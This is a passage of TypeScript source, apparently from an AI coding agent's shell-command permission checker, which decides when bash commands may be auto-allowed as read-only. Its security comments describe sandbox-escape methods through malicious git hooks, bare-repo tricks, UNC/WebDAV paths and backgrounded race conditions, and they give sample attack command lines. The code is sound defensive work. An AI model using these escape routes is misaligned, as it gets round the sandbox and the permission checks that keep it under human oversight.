command before transformation 1902 // This must be done before splitCommand_DEPRECATED because splitCommand_DEPRECATED may transform backslashes 1903 if (containsVulnerableUncPath(command)) { 1904 return { 1905 behavior: 'ask', 1906 message: 1907 'Command contains Windows UNC path that could be vulnerable to WebDAV attacks', 1908 } 1909 } 1910 1911 // Check once if any subcommand is a git command (used for multiple security checks below) 1912 const hasGitCommand = commandHasAnyGit(command) 1913 1914 // SECURITY: Block compound commands that have both cd AND git 1915 // This prevents sandbox escape via: cd /malicious/dir && git status 1916 // where the malicious directory contains fake git hooks that execute arbitrary code. 1917 if (compoundCommandHasCd && hasGitCommand) { 1918 return { 1919 behavior: 'passthrough', 1920 message: 1921 'Compound commands with cd and git require permission checks for enhanced security', 1922 } 1923 } 1924 1925 // SECURITY: Block git commands if the current directory looks like a bare/exploited git repo 1926 // This prevents sandbox escape when an attacker has: 1927 // 1. Deleted .git/HEAD to invalidate the normal git directory 1928 // 2. Created hooks/pre-commit or other git-internal files in the current directory 1929 // Git would then treat the cwd as the git directory and execute malicious hooks. 1930 if (hasGitCommand && isCurrentDirectoryBareGitRepo()) { 1931 return { 1932 behavior: 'passthrough', 1933 message: 1934 'Git commands in directories with bare repository structure require permission checks for enhanced security', 1935 } 1936 } 1937 1938 // SECURITY: Block compound commands that write to git-internal paths AND run git 1939 // This prevents sandbox escape where a command creates git-internal files 1940 // (HEAD, objects/, refs/, hooks/) and then runs git, which would execute 1941 // malicious hooks from the newly created files. 1942 // Example attack: mkdir -p hooks && echo 'malicious' > hooks/pre-commit && git status 1943 if (hasGitCommand && commandWritesToGitInternalPaths(command)) { 1944 return { 1945 behavior: 'passthrough', 1946 message: 1947 'Compound commands that create git internal files and run git require permission checks for enhanced security', 1948 } 1949 } 1950 1951 // SECURITY: Only auto-allow git commands as read-only if we're in the original cwd 1952 // (which is protected by sandbox denyWrite) or if sandbox is disabled (attack is moot). 1953 // Race condition: a sandboxed command can create bare repo files in a subdirectory, 1954 // and a backgrounded git command (e.g. sleep 10 && git status) would pass the 1955 // isCurrentDirectoryBareGitRepo() check at evaluation time before the files exist. 1956 if ( 1957 hasGitCommand && 1958 SandboxManager.isSandboxingEnabled() && 1959 getCwd() !== getOriginalCwd() 1960 ) { 1961 return { 1962 behavior: 'passthrough', 1963 message: 1964 'Git commands outside the original working directory require permission checks when sandbox is enabled', 1965 } 1966 } 1967 1968 // Check if all subcommands are read-only 1969 const allSubcommandsReadOnly = splitCommand_DEPRECATED(command).every( 1970 subcmd => { 1971 if (bashCommandIsSafe_DEPRECATED(subcmd).behavior !== 'passthrough') { 1972 return false 1973 } 1974 return isCommandReadOnly(subcmd) 1975 }, 1976 ) 1977 1978 if (allSubcommandsReadOnly) { 1979 return { 1980 behavior: 'allow', 1981 updatedInput: input, 1982 } 1983 } 1984 1985 // If not read-only, return passthrough to let other permission checks handle it 1986 return { 1987 behavior: 'passthrough', 1988 message: 'Command is not read-only, requires further permission checks', 1989 } 1990 }